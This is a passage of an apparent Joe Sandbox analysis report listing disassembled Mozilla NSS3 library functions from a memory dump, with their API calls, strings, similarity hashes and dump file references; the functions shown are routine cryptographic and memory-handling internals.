                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,-0000001C,-00000020), ref: 6C484150
                                                                                                                                                                                                                                                      • SEC_ASN1EncodeItem_Util.NSS3(00000000,?,-00000010,6C59A1C8), ref: 6C48417E
                                                                                                                                                                                                                                                      • SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,0000007C), ref: 6C484194
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C4841A7
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C4841B2
                                                                                                                                                                                                                                                      • PK11_DestroyObject.NSS3(?,?), ref: 6C4841D9
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C4841FC
                                                                                                                                                                                                                                                      • SEC_ASN1EncodeItem_Util.NSS3(00000000,-0000001C,00000000,6C59A1A8), ref: 6C48422D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Item_$Arena_$Copy$ArenaFree$AlgorithmEncodeError$Alloc_Value$AllocateCriticalDestroyEnterFindInitK11_LockObjectPoolPublicSectionTag_UnlockZfreecallocmemset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 912348568-0
                                                                                                                                                                                                                                                      • Opcode ID: ee8added3202c64b77945b169b3258f19ab5ab8a36f67b19477c5609cd611f08
                                                                                                                                                                                                                                                      • Instruction ID: bb4522adccc4efbbcbfb076fbc69916fc67f739904fb53d7cd31308e9ec1c8dd
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee8added3202c64b77945b169b3258f19ab5ab8a36f67b19477c5609cd611f08
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D45127B5B063006BF710DA299C55F6776ECDF5028DF04162DEC5AC6F92FB31E50882A2
                                                                                                                                                                                                                                                      Function 6C4C8E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C4C8E01,00000000,6C4C9060,6C5D0B64), ref: 6C4C8E7B
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C4C8E01,00000000,6C4C9060,6C5D0B64), ref: 6C4C8E9E
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(6C5D0B64,00000001,?,?,?,?,6C4C8E01,00000000,6C4C9060,6C5D0B64), ref: 6C4C8EAD
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C4C8E01,00000000,6C4C9060,6C5D0B64), ref: 6C4C8EC3
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C4C8E01,00000000,6C4C9060,6C5D0B64), ref: 6C4C8ED8
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C4C8E01,00000000,6C4C9060,6C5D0B64), ref: 6C4C8EE5
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C4C8E01), ref: 6C4C8EFB
                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C5D0B64,6C5D0B64), ref: 6C4C8F11
                                                                                                                                                                                                                                                      • PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C4C8F3F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CA110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C4CA421,00000000,00000000,6C4C9826), ref: 6C4CA136
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4C904A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C4C8E76
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
                                                                                                                                                                                                                                                      • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
                                                                                                                                                                                                                                                      • API String ID: 977052965-1032500510
                                                                                                                                                                                                                                                      • Opcode ID: 8fcf4c89f4c3539f350e3e80c07cbfba7a9924204774654007f4f36c7fb4c83c
                                                                                                                                                                                                                                                      • Instruction ID: 4c9a40202377236fb40e3c15bf405cad87d8915af0cdf4035df5ba189808f4d9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8fcf4c89f4c3539f350e3e80c07cbfba7a9924204774654007f4f36c7fb4c83c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1461BFB9E01115ABDB10CF56CC80EABB7B5FF94359F144128DC18A7710E732E915CBA1
                                                                                                                                                                                                                                                      Function 6C478E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C478E5B
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE007,00000000), ref: 6C478E81
                                                                                                                                                                                                                                                      • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C478EED
                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C5A18D0,?), ref: 6C478F03
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C478F19
                                                                                                                                                                                                                                                      • PL_FreeArenaPool.NSS3(?), ref: 6C478F2B
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C478F53
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C478F65
                                                                                                                                                                                                                                                      • PL_FinishArenaPool.NSS3(?), ref: 6C478FA1
                                                                                                                                                                                                                                                      • SECITEM_DupItem_Util.NSS3(?), ref: 6C478FFE
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C479012
                                                                                                                                                                                                                                                      • PL_FreeArenaPool.NSS3(?), ref: 6C479024
                                                                                                                                                                                                                                                      • PL_FinishArenaPool.NSS3(?), ref: 6C47902C
                                                                                                                                                                                                                                                      • PORT_DestroyCheapArena.NSS3(?), ref: 6C47903E
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
                                                                                                                                                                                                                                                      • String ID: security
                                                                                                                                                                                                                                                      • API String ID: 3512696800-3315324353
                                                                                                                                                                                                                                                      • Opcode ID: 4aaa50fbfab4540e4e57aff12e8bcc6132d0ffce52ec6950c5d934abbb6c676f
                                                                                                                                                                                                                                                      • Instruction ID: c8fbed7eed43c65583cc26e31da36e088f7770bcbdb8fad743b97afa4766209f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4aaa50fbfab4540e4e57aff12e8bcc6132d0ffce52ec6950c5d934abbb6c676f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 195138B1608340ABE720DA589C41FEB73E8AB8575DF41082EF855E7B40E771E90987B3
                                                                                                                                                                                                                                                      Function 6C53CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C53CC7B), ref: 6C53CD7A
                                                                                                                                                                                                                                                        • Part of subcall function 6C53CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C4AC1A8,?), ref: 6C53CE92
                                                                                                                                                                                                                                                      • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C53CDA5
                                                                                                                                                                                                                                                      • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C53CDB8
                                                                                                                                                                                                                                                      • PR_UnloadLibrary.NSS3(00000000), ref: 6C53CDDB
                                                                                                                                                                                                                                                      • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C53CD8E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4605C0: PR_EnterMonitor.NSS3 ref: 6C4605D1
                                                                                                                                                                                                                                                        • Part of subcall function 6C4605C0: PR_ExitMonitor.NSS3 ref: 6C4605EA
                                                                                                                                                                                                                                                      • PR_LoadLibrary.NSS3(wship6.dll), ref: 6C53CDE8
                                                                                                                                                                                                                                                      • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C53CDFF
                                                                                                                                                                                                                                                      • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C53CE16
                                                                                                                                                                                                                                                      • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C53CE29
                                                                                                                                                                                                                                                      • PR_UnloadLibrary.NSS3(00000000), ref: 6C53CE48
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
                                                                                                                                                                                                                                                      • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                                                                                                                                                                                                                      • API String ID: 601260978-871931242
                                                                                                                                                                                                                                                      • Opcode ID: fee7af10b3ca1f3041b1b21be0524b29e1fa3f382f07f1c5a2a9968e8bd200c3
                                                                                                                                                                                                                                                      • Instruction ID: 26505c588ef992026798ea1404a98cb9264095256be2de7fcd0ec53e61330f7f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fee7af10b3ca1f3041b1b21be0524b29e1fa3f382f07f1c5a2a9968e8bd200c3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A411A2F5E0227152D702F6BA2C00E9F3A985B0212DF185A3DF80992E41FB21E519C2EE
                                                                                                                                                                                                                                                      Function 6C581C60 Relevance: 25.6, APIs: 17, Instructions: 114COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6C5813BC,?,?,?,6C581193), ref: 6C581C6B
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,6C581193), ref: 6C581C7E
                                                                                                                                                                                                                                                        • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
                                                                                                                                                                                                                                                      • PR_NewCondVar.NSS3(00000000,?,6C581193), ref: 6C581C91
                                                                                                                                                                                                                                                        • Part of subcall function 6C45BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C4621BC), ref: 6C45BB8C
                                                                                                                                                                                                                                                      • PR_NewCondVar.NSS3(00000000,?,?,6C581193), ref: 6C581CA7
                                                                                                                                                                                                                                                        • Part of subcall function 6C45BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C45BBEB
                                                                                                                                                                                                                                                        • Part of subcall function 6C45BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C45BBFB
                                                                                                                                                                                                                                                        • Part of subcall function 6C45BB80: GetLastError.KERNEL32 ref: 6C45BC03
                                                                                                                                                                                                                                                        • Part of subcall function 6C45BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C45BC19
                                                                                                                                                                                                                                                        • Part of subcall function 6C45BB80: free.MOZGLUE(00000000), ref: 6C45BC22
                                                                                                                                                                                                                                                      • PR_NewCondVar.NSS3(00000000,?,?,?,6C581193), ref: 6C581CBE
                                                                                                                                                                                                                                                      • PR_NewCondVar.NSS3(00000000,?,?,?,?,6C581193), ref: 6C581CD4
                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6C581193), ref: 6C581CFE
                                                                                                                                                                                                                                                      • PR_Lock.NSS3(?,?,?,?,?,?,?,6C581193), ref: 6C581D1A
                                                                                                                                                                                                                                                        • Part of subcall function 6C539BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C461A48), ref: 6C539BB3
                                                                                                                                                                                                                                                        • Part of subcall function 6C539BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C461A48), ref: 6C539BC8
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6C581193), ref: 6C581D3D
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE890,00000000,?,6C581193), ref: 6C581D4E
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6C581193), ref: 6C581D64
                                                                                                                                                                                                                                                      • PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6C581193), ref: 6C581D6F
                                                                                                                                                                                                                                                      • PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6C581193), ref: 6C581D7B
                                                                                                                                                                                                                                                      • PR_DestroyCondVar.NSS3(?,?,?,?,?,6C581193), ref: 6C581D87
                                                                                                                                                                                                                                                      • PR_DestroyCondVar.NSS3(00000000,?,?,?,6C581193), ref: 6C581D93
                                                                                                                                                                                                                                                      • PR_DestroyLock.NSS3(00000000,?,?,6C581193), ref: 6C581D9F
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,6C581193), ref: 6C581DA8
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3246495057-0
                                                                                                                                                                                                                                                      • Opcode ID: cae1d66b2f0cf95c37d1efe2fe80e78f10fc9f1f8a20f2f0846192b904d1f43b
                                                                                                                                                                                                                                                      • Instruction ID: 9696cfaf0797367fd5f2697e605951775df7a1f3c55923bd30aa4441fae68481
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cae1d66b2f0cf95c37d1efe2fe80e78f10fc9f1f8a20f2f0846192b904d1f43b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A231A6F1E017119BEB10DF25AC41E577AE4AF4165CB044838E85A87F41FB31E918CBD6
                                                                                                                                                                                                                                                      Function 6C495E60 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 348COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C495ECF
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C495EE3
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C495F0A
                                                                                                                                                                                                                                                      • PK11_MakeIDFromPubKey.NSS3(00000014), ref: 6C495FB5
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalEnterFromK11_MakeSectionUnlockValue
                                                                                                                                                                                                                                                      • String ID: NSS_USE_DECODED_CKA_EC_POINT$S&Kl$S&Kl
                                                                                                                                                                                                                                                      • API String ID: 2280678669-3493570118
                                                                                                                                                                                                                                                      • Opcode ID: 9ee36f6f3421adb17eea872c6822a720a557d0ccd6e57fb83866a2d16e94dc40
                                                                                                                                                                                                                                                      • Instruction ID: b66b5fa3fdf5420d864ffc3bd8e17649cb547b83c1de77f52ed53bbac42ed9de
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9ee36f6f3421adb17eea872c6822a720a557d0ccd6e57fb83866a2d16e94dc40
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 97F1F4B5A002158FDB44CF19C884B86BBF4FF09304F5582AADC089B746E775EA95CF91
                                                                                                                                                                                                                                                      Function 6C4E0C60 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 153memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(*,Nl), ref: 6C4E0C81
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CBE30: SECOID_FindOID_Util.NSS3(6C48311B,00000000,?,6C48311B,?), ref: 6C4CBE44
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B8500: SECOID_GetAlgorithmTag_Util.NSS3(6C4B95DC,00000000,00000000,00000000,?,6C4B95DC,00000000,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4B8517
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C4E0CC4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFAB0: free.MOZGLUE(?,-00000001,?,?,6C46F673,00000000,00000000), ref: 6C4CFAC7
                                                                                                                                                                                                                                                      • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C4E0CD5
                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C4E0D1D
                                                                                                                                                                                                                                                      • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C4E0D3B
                                                                                                                                                                                                                                                      • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C4E0D7D
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4E0DB5
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C4E0DC1
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4E0DF7
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C4E0E05
                                                                                                                                                                                                                                                      • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C4E0E0F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4B95E0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4B95F5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C4B9609
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C4B961D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B95C0: PK11_GetInternalSlot.NSS3 ref: 6C4B970B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C4B9756
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B95C0: PK11_GetIVLength.NSS3(?), ref: 6C4B9767
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C4B977E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C4B978E
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                                                                                                                                                                                      • String ID: *,Nl$*,Nl$-$Nl
                                                                                                                                                                                                                                                      • API String ID: 3136566230-2208369651
                                                                                                                                                                                                                                                      • Opcode ID: 10a9a8f5b7265a7dd45074ff60fafff3ef5e9c3c5fec30048b4b1175b9359c40
                                                                                                                                                                                                                                                      • Instruction ID: 311245155af9722638394abcdae3ef89250880e9ccdec5aab4754aa49cb646cb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 10a9a8f5b7265a7dd45074ff60fafff3ef5e9c3c5fec30048b4b1175b9359c40
